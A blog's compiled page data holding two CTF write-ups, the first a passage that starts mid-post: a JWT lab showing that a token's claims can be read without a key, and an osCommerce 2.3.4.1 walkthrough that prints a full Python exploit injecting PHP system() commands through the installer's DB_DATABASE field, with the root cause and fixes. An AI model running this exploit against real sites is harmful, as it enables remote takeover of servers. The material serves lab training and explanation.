i read so far and it\\u2019s by Kasey Speakman. 
I am dropping his dev profile here, do drop a heart on his actual comment that is linked below.\"), mdx(\"p\", null, mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://dev.to/kspeakman\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"kspeakman on Dev\")), mdx(\"p\", null, mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://dev.to/kspeakman/comment/om9\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"kspeakman\\u2019s take on JWT\")), mdx(\"h2\", {\n    \"id\": \"lets-get-into-the-actual-working-now\"\n  }, \"Let\\u2019s get into the actual working now\"), mdx(\"p\", null, \"A JWT is of the format \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"xxxxxxxxx.yyyyyyyyyyy.zzzzzzzzzzzz\"), \".\"), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"x\\u2019s specify the algorithm used to sign the JWT in base64.\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"y\\u2019s contain the claims in base64.\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"z\\u2019s are the signature that is generated with \", mdx(\"inlineCode\", {\n    parentName: \"li\"\n  }, \"xxxxxxxxx.yyyyyyyyyyy\"), \" as the data.\")), mdx(\"p\", null, \"The Algorithms that are generally used to sign JWT includes:\"), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"HS256 (Symmetric)\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"RS256 (Asymmetric)\")), mdx(\"h2\", {\n    \"id\": \"where-are-these-used\"\n  }, \"Where are these used?\"), mdx(\"p\", null, \"As far as our lab is concerned, we use it to authenticate users to a website. So when a user logins to a website the website will issue a JWT with the claims of who the user is and any additional information. This JWT is sent back to the website in the subsequent requests made by the user. 
The JWT is first verified to check if the signature is legit. For a symmetric algorithm such as HS256 this is done by again signing the \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"xxxxxxxxx.yyyyyyyyyyy\"), \" part of the token with the server\\u2019s secret and checking that the result matches the signature sent as part of the JWT (for RS256 the server instead verifies the signature with its public key). The server must do this with the algorithm and key it expects, not with whatever the token header claims, otherwise the check can be bypassed. Only if the signature verifies can the server trust the claims that come with the JWT. If any user tries to tamper with the claims in the JWT (the data in the yyyyyyyyyyyy part) then the signature won\\u2019t match and the website should reject the request with an unauthorized response.\"), mdx(\"h1\", {\n    \"id\": \"now-the-lab\"\n  }, \"Now the Lab\"), mdx(\"h3\", {\n    \"id\": \"mission-\"\n  }, \"Mission \\uD83D\\uDCBB\"), mdx(\"p\", null, \"Retrieve the secret information present in the token payload!\"), mdx(\"p\", null, \"We are given a CMS to interact with. The lab also gives you the username and password to log in to the user account.\"), mdx(\"h3\", {\n    \"id\": \"lets-start\"\n  }, \"Let\\u2019s start\"), mdx(\"p\", null, \"Starting the lab you will be given a virtual environment where the CMS is hosted in your local network and you have a machine with all the tools you will need preinstalled.\"), mdx(\"p\", null, \"The challenge page also gives you a few instructions on how to access the CMS that is hosted in your local environment.\"), mdx(\"p\", null, \" \", mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/cw5ajh16skmk25mfcrrj.png\",\n    \"alt\": \"Lab instructions\"\n  }))), mdx(\"p\", null, \"It says the CMS runs on port 1337 and since I have already worked with a CMS that works on that port, I knew it was \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://strapi.io\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"strapi\"), \" already.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": 
\"https://dev-to-uploads.s3.amazonaws.com/i/ymodt7ntztsr4n1gmbmo.png\",\n    \"alt\": \"Strapi page\"\n  }))), mdx(\"p\", null, \"Now let us try to login with the credentials given. Strapi currently manages admin and end users separately. I assume that the credentials given to us are of the end user. So we can\\u2019t access the strapi admin page with these credentials. All we need is the JWT because out flag is hidden these as the name of the challege suggests.\"), mdx(\"p\", null, \"First we need to find the IP address on which the CMS is hosted. For that run \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"ifconfig\"), \" in your console to find your IP and then follow the instructions of the challenge to find the IP of the CMS.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/55zcxc4e198lzkx38jd2.png\",\n    \"alt\": \"ifconfig\"\n  }))), mdx(\"p\", null, \"In my case my IP was 192.142.236.2 and that of the CMS was 192.142.236.3. It is given in the challenge on what is the auth endpoint and the parameters that it accepts.\"), mdx(\"p\", null, \" \", mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/yvsdjai6skiwa2y2orey.png\",\n    \"alt\": \"Api Endpoints\"\n  }))), mdx(\"p\", null, \"Let us use curl to send the request. 
I ran the following command to send a POST request to the CMS and retrieve the JWT from the response.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/xprsxz9y4jfpi9ac1pkn.png\",\n    \"alt\": \"Alt Text\"\n  }))), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/1oou9fr14ikphwjxokd8.png\",\n    \"alt\": \"post request curl\"\n  }))), mdx(\"p\", null, \"Now copy that JWT from the console and head over to \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://jwt.io\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"jwt.io\"), \", which decodes the JWT for us. No key is needed for this, because the header and payload are only base64url-encoded. One caveat for real engagements: a live token is a credential, so decode it locally (for example by base64-decoding the middle segment) rather than pasting it into a third-party website. \"), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/482chkws77fkqb5kh1ei.png\",\n    \"alt\": \"jwt.io\"\n  }))), mdx(\"h2\", {\n    \"id\": \"voila-theres-our-flag\"\n  }, \"Voila, there\\u2019s our flag\\uD83C\\uDF89.\"), mdx(\"h1\", {\n    \"id\": \"learning\"\n  }, \"Learning\"), mdx(\"p\", null, \"Sometimes developers end up putting sensitive information in the JWT payload. 
A signed JWT (a JWS) protects the integrity of its claims, not their confidentiality: anything placed in the payload is readable by whoever holds the token, including the user and anyone who intercepts or logs it. Check for such leaks during bug bounty work, and when building your own application keep secrets out of the payload (store a reference such as a user ID and look the rest up server-side, or use an encrypted JWE if the claims themselves must stay private).\"));\n}\n;\nMDXContent.isMDXComponent = true;","hero":{"full":{"base64":"data:image/png;base64,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","aspectRatio":1.7777777777777777,"src":"/static/0f372e8e23957ad5ab3664ca83f23bee/f4f8c/hero.png","srcSet":"/static/0f372e8e23957ad5ab3664ca83f23bee/206f6/hero.png 236w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/84032/hero.png 472w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/f4f8c/hero.png 944w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/513fc/hero.png 1416w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/6eada/hero.png 1888w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/a028c/hero.png 2560w","srcWebp":"/static/0f372e8e23957ad5ab3664ca83f23bee/99fbb/hero.webp","srcSetWebp":"/static/0f372e8e23957ad5ab3664ca83f23bee/77392/hero.webp 236w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/1f177/hero.webp 472w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/99fbb/hero.webp 944w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/4a492/hero.webp 1416w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/b0b8f/hero.webp 1888w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/22dcf/hero.webp 2560w","sizes":"(max-width: 944px) 100vw, 944px"},"regular":{"base64":"data:image/png;base64,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","aspectRatio":1.7777777777777777,"src":"/static/0f372e8e23957ad5ab3664ca83f23bee/3e3e7/hero.png","srcSet":"/static/0f372e8e23957ad5ab3664ca83f23bee/a123b/hero.png 163w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/b6f5d/hero.png 327w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/3e3e7/hero.png 653w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/de899/hero.png 980w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/00f25/hero.png 1306w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/a028c/hero.png 2560w","srcWebp":"/static/0f372e8e23957ad5ab3664ca83f23bee/0acdf/hero.webp","srcSetWebp":"/static/0f372e8e23957ad5ab3664ca83f23bee/ac59e/hero.webp 
163w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/7660b/hero.webp 327w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/0acdf/hero.webp 653w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/75470/hero.webp 980w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/68d47/hero.webp 1306w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/22dcf/hero.webp 2560w","sizes":"(max-width: 653px) 100vw, 653px"},"narrow":{"base64":"data:image/png;base64,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","aspectRatio":1.7777777777777777,"src":"/static/0f372e8e23957ad5ab3664ca83f23bee/f156e/hero.png","srcSet":"/static/0f372e8e23957ad5ab3664ca83f23bee/f2848/hero.png 114w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/42f31/hero.png 229w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/f156e/hero.png 457w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/cf471/hero.png 686w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/3bc69/hero.png 914w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/a028c/hero.png 2560w","srcWebp":"/static/0f372e8e23957ad5ab3664ca83f23bee/15384/hero.webp","srcSetWebp":"/static/0f372e8e23957ad5ab3664ca83f23bee/31fce/hero.webp 114w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/e3e25/hero.webp 229w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/15384/hero.webp 457w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/0258d/hero.webp 686w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/64ea2/hero.webp 914w,\n/static/0f372e8e23957ad5ab3664ca83f23bee/22dcf/hero.webp 2560w","sizes":"(max-width: 457px) 100vw, 457px"},"seo":{"src":"/static/0f372e8e23957ad5ab3664ca83f23bee/7ef28/hero.png"}}},{"id":"34ceee51-9606-5899-ab9d-2740dcccd2f9","slug":"/ctf-live-ecommerce-web-to-shell-walkthrough","secret":false,"title":"CTF.live - Ecommerce - Web to Shell Walkthrough","author":"Anudeep Reddy","date":"July 27th, 2020","dateForSEO":"2020-07-27T00:00:00.000Z","timeToRead":3,"excerpt":"This post is a walkthrough of a lab from ctflive.","subscription":true,"body":"function _extends() { _extends = Object.assign || function (target) { for (var i = 1; i < 
arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; return _extends.apply(this, arguments); }\n\nfunction _objectWithoutProperties(source, excluded) { if (source == null) return {}; var target = _objectWithoutPropertiesLoose(source, excluded); var key, i; if (Object.getOwnPropertySymbols) { var sourceSymbolKeys = Object.getOwnPropertySymbols(source); for (i = 0; i < sourceSymbolKeys.length; i++) { key = sourceSymbolKeys[i]; if (excluded.indexOf(key) >= 0) continue; if (!Object.prototype.propertyIsEnumerable.call(source, key)) continue; target[key] = source[key]; } } return target; }\n\nfunction _objectWithoutPropertiesLoose(source, excluded) { if (source == null) return {}; var target = {}; var sourceKeys = Object.keys(source); var key, i; for (i = 0; i < sourceKeys.length; i++) { key = sourceKeys[i]; if (excluded.indexOf(key) >= 0) continue; target[key] = source[key]; } return target; }\n\n/* @jsx mdx */\nvar _frontmatter = {\n  \"title\": \"CTF.live - Ecommerce - Web to Shell Walkthrough\",\n  \"author\": \"Anudeep Reddy\",\n  \"date\": \"2020-07-27T00:00:00.000Z\",\n  \"hero\": \"./images/hero.png\",\n  \"excerpt\": \"This post is a walkthrough of a lab from ctflive.\"\n};\n\nvar makeShortcode = function makeShortcode(name) {\n  return function MDXDefaultShortcode(props) {\n    console.warn(\"Component \" + name + \" was not imported, exported, or provided by MDXProvider as global scope\");\n    return mdx(\"div\", props);\n  };\n};\n\nvar layoutProps = {\n  _frontmatter: _frontmatter\n};\nvar MDXLayout = \"wrapper\";\nreturn function MDXContent(_ref) {\n  var components = _ref.components,\n      props = _objectWithoutProperties(_ref, [\"components\"]);\n\n  return mdx(MDXLayout, _extends({}, layoutProps, props, {\n    components: components,\n    mdxType: \"MDXLayout\"\n  }), mdx(\"p\", null, \"This post is a walkthrough of a lab 
from \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://ctflive.com\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"ctflive\"), \". As the name suggests it\\u2019s a Web Application Lab. I have been in search of beginner level labs to get started and found ctf lab which has labs that are beginner friendly. So without wasting much of your time let\\u2019s get started. \"), mdx(\"blockquote\", null, mdx(\"p\", {\n    parentName: \"blockquote\"\n  }, \"Please go through the entire post as i am going to breakdown the exploit that was used \\uD83D\\uDC68\\u200D\\uD83D\\uDCBB.\")), mdx(\"p\", null, \"Before reading this I would like you to give it a try yourself. Here is the link to the lab. \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://www.ctf.live/challengedetails?cid=42\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"Ecommerce: Web to Shell\")), mdx(\"h2\", {\n    \"id\": \"walkthrough\"\n  }, \"Walkthrough\"), mdx(\"p\", null, \"Once you start your lab and open it you should see a e-commerce site. Looking around you can observe that it\\u2019s a php based website. First of all let us try to understand what we need to achieve. \"), mdx(\"h3\", {\n    \"id\": \"mission\"\n  }, \"Mission\"), mdx(\"pre\", null, mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {}), \"The attacker might not have any user-level access to the web application. However, this does not mean that the application cannot be attacked remotely. Vulnerabilities could be triggered even by unauthenticated users.\\n\\nIn this challenge, the attacker is unauthenticated to the web application and needs to find and exploit the vulnerability.\\n\\nObjective: Exploit the vulnerability and retrieve the flag.\\n\")), mdx(\"p\", null, \"This is the mission provided in the lab description. Let\\u2019s try to understand what it means. 
\", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"The attacker might not have any user-level access to the web application\"), \", this statement clearly gives  you a hint that you need not create a user account to exploit this lab. And if we look closely at the name of the lab Ecommerce: \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"Web to Shell\"), \", does it ring any bells??.\"), mdx(\"p\", null, \"If you guessed that you need to get a shell access then you are right\\uD83E\\uDD73.\"), mdx(\"p\", null, \"Let\\u2019s start with some recon. I ran a \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"nmap\"), \" scan on the host to grab some info.\"), mdx(\"pre\", null, mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {}), \"$> nmap -A <link-to-lab>\\n\")), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/2jzgoz3bagogh4pm62ns.png\",\n    \"alt\": \"Nmap scan results\"\n  }))), mdx(\"p\", null, \"From the nmap results now we know that there are two open ports:\\n1. Port 22 running \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\"), \"\\n2. Port 80 running \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"Apache/2.4.7\")), mdx(\"p\", null, \"Let us try to find if there are any vulnerabilities which might lead to RCE(Remote Code Execution) on Apache/2.4.7 as our ultimate goal is to get a shell access. For the vulnerability search let\\u2019s dive into \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://www.exploit-db.com\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"exploit-db\"), \" and search for Apache/2.4.7. 
I found the following vulnerabilities.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/p33w8z2m9q01f4e0tvq1.png\",\n    \"alt\": \"Exploit-db results\"\n  }))), mdx(\"p\", null, \"The first one is our point of interest, as it is a Remote Code Execution exploit. But it only works against Apache/2.4.7 in combination with PHP/7.0.2. Our application also runs PHP, but a version-matched exploit is only worth trying once the exact version is confirmed, so let\\u2019s find out which PHP version the application is using. For that, head over to \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"<link-to-lab>/phpinfo.php\"), \", which should give you a page similar to this. (A phpinfo page reachable by unauthenticated users is itself an information-disclosure finding worth reporting: it reveals the PHP version, loaded modules, file paths and configuration.)\"), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/qsi5s2rcjfv4lh5836j5.png\",\n    \"alt\": \"phpinfo page\"\n  }))), mdx(\"p\", null, \"Oops! It\\u2019s not PHP/7.0.2 but PHP/5.5.9, so that exploit won\\u2019t work here. \"), mdx(\"h3\", {\n    \"id\": \"get-back-to-basics\"\n  }, \"Get back to basics\"), mdx(\"p\", null, \"Now let\\u2019s go back to recon.\\nAt this point I started looking at the website itself. Initially I thought osCommerce was the name of the store, but if you look at the footer of the website you will find something interesting: it says \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"Powered by osCommerce\"), \". A quick Google search reveals that \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"osCommerce is an e-commerce and online store-management software program\"), \". 
Now let us again dive back to exploit-db and search for vulnerabilities with osCommerce (Application level vulnerability) and you find this.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/00oa6vj8e6kzeoijsajd.png\",\n    \"alt\": \"oscommerce vulns\"\n  }))), mdx(\"p\", null, \"Let\\u2019s try out the fourth vulnerability that is listed in the image above. The following exploit code is found along with the vulnerability.\"), mdx(\"pre\", null, mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-python\"\n  }), \"\\nimport requests\\n\\n# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)\\nbase_url = \\\"http://localhost//oscommerce-2.3.4.1/catalog/\\\"\\ntarget_url = \\\"http://localhost/oscommerce-2.3.4.1/catalog/install/install.php?step=4\\\"\\n\\ndata = {\\n    'DIR_FS_DOCUMENT_ROOT': './'\\n}\\n\\n# the payload will be injected into the configuration file via this code\\n# '  define(\\\\'DB_DATABASE\\\\', \\\\'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\\\\');' . \\\"\\\\n\\\" .\\n# so the format for the exploit will be: '); PAYLOAD; /*\\n\\npayload = '\\\\');'\\npayload += 'system(\\\"ls\\\");'    # this is where you enter you PHP payload\\npayload += '/*'\\n\\ndata['DB_DATABASE'] = payload\\n\\n# exploit it\\nr = requests.post(url=target_url, data=data)\\n\\nif r.status_code == 200:\\n    print(\\\"[+] Successfully launched the exploit. 
Open the following URL to execute your code\\\\n\\\\n\\\" + base_url + \\\"install/includes/configure.php\\\")\\nelse:\\n    print(\\\"[-] Exploit did not execute as planned\\\")\\n            \\n\")), mdx(\"p\", null, \"Now in the above exploit code I replaced the target url to the lab url and it should look like this.\"), mdx(\"pre\", null, mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-python\"\n  }), \"import requests\\n\\n# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)\\nbase_url = \\\"http://l4eowcwhoggdly42685x49mzl.ctf-india.attackdefenselabs.com\\\"\\ntarget_url = \\\"http://l4eowcwhoggdly42685x49mzl.ctf-india.attackdefenselabs.com/install/install.php?step=4\\\"\\n\\ndata = {\\n    'DIR_FS_DOCUMENT_ROOT': './'\\n}\\n\\n# the payload will be injected into the configuration file via this code\\n# '  define(\\\\'DB_DATABASE\\\\', \\\\'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\\\\');' . \\\"\\\\n\\\" .\\n# so the format for the exploit will be: '); PAYLOAD; /*\\n\\npayload = '\\\\');'\\npayload += 'system(\\\"ls\\\");'    # this is where you enter you PHP payload\\npayload += '/*'\\n\\ndata['DB_DATABASE'] = payload\\n\\n# exploit it\\nr = requests.post(url=target_url, data=data)\\n\\nif r.status_code == 200:\\n    print(\\\"[+] Successfully launched the exploit. 
Open the following URL to execute your code\\\\n\\\\n\\\" + base_url + \\\"install/includes/configure.php\\\")\\nelse:\\n    print(\\\"[-] Exploit did not execute as planned\\\")\\n            \\n\")), mdx(\"p\", null, \"Now let us run the exploit.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/5svf0dvxe8qumfs71w8p.png\",\n    \"alt\": \"exploit output\"\n  }))), mdx(\"p\", null, \"The output in the terminal says the exploit was successful, buts let\\u2019s checkout if it actually works.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/7lgwomfd4oy5h50mirc6.png\",\n    \"alt\": \"shell output 1\"\n  }))), mdx(\"p\", null, \"Opening the link that was printed on the console actually runs the ls command on the server. Now we have shell access to the application that allows us to perform RCE(Remote Code Execution). Now let us change the command from the exploit code and let us try to find the flag file on the server.\"), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, mdx(\"strong\", {\n    parentName: \"li\"\n  }, \"Try 1\"), \": cd to the root of the server and check if there are any interesting files or folders.\")), mdx(\"blockquote\", null, mdx(\"p\", {\n    parentName: \"blockquote\"\n  }, \"I have changed the payload to the following\"), mdx(\"pre\", {\n    parentName: \"blockquote\"\n  }, mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-python\"\n  }), \"payload += 'system(\\\"cd / && ls\\\");'    # this is where you enter you PHP \\n\")), mdx(\"p\", {\n    parentName: \"blockquote\"\n  }, \"Run the exploit again and check the output.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/z1myqizn0mljk8h09okw.png\",\n    \"alt\": \"shell output 2\"\n  }))), 
mdx(\"p\", null, \"The app folder looks interesting. Change the payload in the exploit, list the files in that folder and you should find a flag file. Print it out to get your flag.\"), mdx(\"p\", null, \"Our final payload looks like this.\"), mdx(\"pre\", null, mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-python\"\n  }), \"payload += 'system(\\\"cat /app/flag*\\\");'    # this is where you enter you PHP payload\\n\")), mdx(\"p\", null, \"There you go: your flag, which looks like an MD5 hash.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://dev-to-uploads.s3.amazonaws.com/i/luk19ts6b145ejvr3ki7.png\",\n    \"alt\": \"flag\"\n  }))), mdx(\"h2\", {\n    \"id\": \"bingo-we-just-solved-our-first-lab\"\n  }, \"Bingo\\uD83C\\uDF89, we just solved our first lab.\"), mdx(\"h1\", {\n    \"id\": \"let-us-try-to-understand-what-just-happened\"\n  }, \"Let us try to understand what just happened\"), mdx(\"p\", null, \"If you look back at the exploit code you will see that we are just sending a single unauthenticated POST request with a crafted payload. So I downloaded the source code of osCommerce (you can find it \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://www.oscommerce.com/Products\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"here\"), \") and the problem lies in the osCommerce installation process.\"), mdx(\"p\", null, \"The first problem is that osCommerce does not check whether the application is already installed: the install/ directory stays reachable after setup, so an unauthenticated attacker can re-run the installer and reconfigure a live site. 
We send the POST request to \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"step 4\"), \" because step 4 of the installer takes the database settings and writes them, together with the rest of the configuration, into \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"install/includes/configure.php\"), \". The second, and bigger, problem is that this user input is interpolated straight into PHP source without being escaped or validated. As the comment in the exploit shows, the DB_DATABASE value is pasted inside a define() call, so a value of the form '); PAYLOAD; /* closes the string and the call, appends arbitrary PHP, and comments out the rest of the line. Requesting configure.php from the browser then executes the injected system() call in the context of the web-server process, which gives us remote command execution. The fixes are the usual ones: remove or lock down the install/ directory once installation is complete, refuse to re-run the installer when a configuration already exists, and never write unescaped user input into executable source. This marks the end of this lab.\"), mdx(\"h1\", {\n    \"id\": \"happy-hacking-\"\n  }, \"Happy hacking \\uD83D\\uDC68\\u200D\\uD83D\\uDCBB\"), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://i.giphy.com/media/l3vRmVv5P01I5NDAA/giphy.gif\",\n    \"alt\": \"happy hacking\"\n  }))));\n}\n;\nMDXContent.isMDXComponent = true;","hero":{"full":{"base64":"data:image/png;base64,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","aspectRatio":1.7777777777777777,"src":"/static/8d48637e90d60e8ef5bd8d332922de90/f4f8c/hero.png","srcSet":"/static/8d48637e90d60e8ef5bd8d332922de90/206f6/hero.png 236w,\n/static/8d48637e90d60e8ef5bd8d332922de90/84032/hero.png 472w,\n/static/8d48637e90d60e8ef5bd8d332922de90/f4f8c/hero.png 944w,\n/static/8d48637e90d60e8ef5bd8d332922de90/513fc/hero.png 1416w,\n/static/8d48637e90d60e8ef5bd8d332922de90/6eada/hero.png 1888w,\n/static/8d48637e90d60e8ef5bd8d332922de90/a028c/hero.png 2560w","srcWebp":"/static/8d48637e90d60e8ef5bd8d332922de90/99fbb/hero.webp","srcSetWebp":"/static/8d48637e90d60e8ef5bd8d332922de90/77392/hero.webp 236w,\n/static/8d48637e90d60e8ef5bd8d332922de90/1f177/hero.webp 472w,\n/static/8d48637e90d60e8ef5bd8d332922de90/99fbb/hero.webp 
944w,\n/static/8d48637e90d60e8ef5bd8d332922de90/4a492/hero.webp 1416w,\n/static/8d48637e90d60e8ef5bd8d332922de90/b0b8f/hero.webp 1888w,\n/static/8d48637e90d60e8ef5bd8d332922de90/22dcf/hero.webp 2560w","sizes":"(max-width: 944px) 100vw, 944px"},"regular":{"base64":"data:image/png;base64,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","aspectRatio":1.7777777777777777,"src":"/static/8d48637e90d60e8ef5bd8d332922de90/3e3e7/hero.png","srcSet":"/static/8d48637e90d60e8ef5bd8d332922de90/a123b/hero.png 163w,\n/static/8d48637e90d60e8ef5bd8d332922de90/b6f5d/hero.png 327w,\n/static/8d48637e90d60e8ef5bd8d332922de90/3e3e7/hero.png 653w,\n/static/8d48637e90d60e8ef5bd8d332922de90/de899/hero.png 980w,\n/static/8d48637e90d60e8ef5bd8d332922de90/00f25/hero.png 1306w,\n/static/8d48637e90d60e8ef5bd8d332922de90/a028c/hero.png 2560w","srcWebp":"/static/8d48637e90d60e8ef5bd8d332922de90/0acdf/hero.webp","srcSetWebp":"/static/8d48637e90d60e8ef5bd8d332922de90/ac59e/hero.webp 163w,\n/static/8d48637e90d60e8ef5bd8d332922de90/7660b/hero.webp 327w,\n/static/8d48637e90d60e8ef5bd8d332922de90/0acdf/hero.webp 653w,\n/static/8d48637e90d60e8ef5bd8d332922de90/75470/hero.webp 980w,\n/static/8d48637e90d60e8ef5bd8d332922de90/68d47/hero.webp 1306w,\n/static/8d48637e90d60e8ef5bd8d332922de90/22dcf/hero.webp 2560w","sizes":"(max-width: 653px) 100vw, 653px"},"narrow":{"base64":"data:image/png;base64,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","aspectRatio":1.7777777777777777,"src":"/static/8d48637e90d60e8ef5bd8d332922de90/f156e/hero.png","srcSet":"/static/8d48637e90d60e8ef5bd8d332922de90/f2848/hero.png 114w,\n/static/8d48637e90d60e8ef5bd8d332922de90/42f31/hero.png 229w,\n/static/8d48637e90d60e8ef5bd8d332922de90/f156e/hero.png 457w,\n/static/8d48637e90d60e8ef5bd8d332922de90/cf471/hero.png 686w,\n/static/8d48637e90d60e8ef5bd8d332922de90/3bc69/hero.png 914w,\n/static/8d48637e90d60e8ef5bd8d332922de90/a028c/hero.png 
2560w","srcWebp":"/static/8d48637e90d60e8ef5bd8d332922de90/15384/hero.webp","srcSetWebp":"/static/8d48637e90d60e8ef5bd8d332922de90/31fce/hero.webp 114w,\n/static/8d48637e90d60e8ef5bd8d332922de90/e3e25/hero.webp 229w,\n/static/8d48637e90d60e8ef5bd8d332922de90/15384/hero.webp 457w,\n/static/8d48637e90d60e8ef5bd8d332922de90/0258d/hero.webp 686w,\n/static/8d48637e90d60e8ef5bd8d332922de90/64ea2/hero.webp 914w,\n/static/8d48637e90d60e8ef5bd8d332922de90/22dcf/hero.webp 2560w","sizes":"(max-width: 457px) 100vw, 457px"},"seo":{"src":"/static/8d48637e90d60e8ef5bd8d332922de90/7ef28/hero.png"}}}]}}}